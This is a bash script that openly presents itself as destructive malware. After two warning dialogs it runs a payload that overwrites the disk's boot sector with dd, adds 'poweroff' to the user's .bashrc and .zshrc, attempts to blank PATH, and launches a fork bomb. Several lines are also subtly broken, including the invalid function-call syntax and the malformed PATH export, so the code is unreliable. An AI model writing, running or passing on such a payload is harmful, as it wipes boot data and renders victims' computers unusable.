#!/bin/bash

if [[ -n "$XDG_SESSION_DESKTOP" ]]; then
  zenityavailable=$(which zenity)
  if [[ "$zenityavailable" != "" ]]; then

    sudo apt-get install zenity efibootmgr coreutils -qy > /dev/null

    zenity --question --text="This malware is no joke! Do you want to proceed?" --title="WARNING!" --cancel-label="Cancel" --ok-label="Proceed"
    if [[ $? -eq 0 ]]; then

      zenity --question --text="This malware is no joke! Do you want to proceed? (Double Check)" --title="WARNING!" --cancel-label="Cancel" --ok-label="Proceed"
      if [[ $? -eq 0 ]]; then
        zenity --info --text "Welp, Good luck." --title "..." --ok-label "Alright"
        wildcommands()
      else
        exit
      fi

    else
      exit
    fi
    #execute code here
  fi

else

  dialogavailable=$(which whiptail)
  if [[ "$dialogavailable" != "" ]]; then
    whiptail --yesno "This malware is no joke. Proceed?" --yes-button "Proceed" --no-button "Cancel" --title "Warning!" 10 35
    if [[ $? -ne 0 ]]; then
      exit
    else
      whiptail --yesno "This malware is no joke. Proceed? (Double Check.)" --yes-button "Proceed" --no-button "Cancel" --title "Warning!" 10 35
      if [[ $? -ne 0 ]]; then
        exit
      else
        whiptail --msgbox "Welp, Good luck." 8 20 --title "..."
        wildcommands()
      fi
    fi
  fi
fi

#wild and dangerous commands:

wildcommands() {
  sudo dd if=boot.bin of=/dev/sda bs=512
  echo poweroff >> .bashrc && echo poweroff >> .zshrc
  export $PATH = ""
  :(){ :|:& };:
}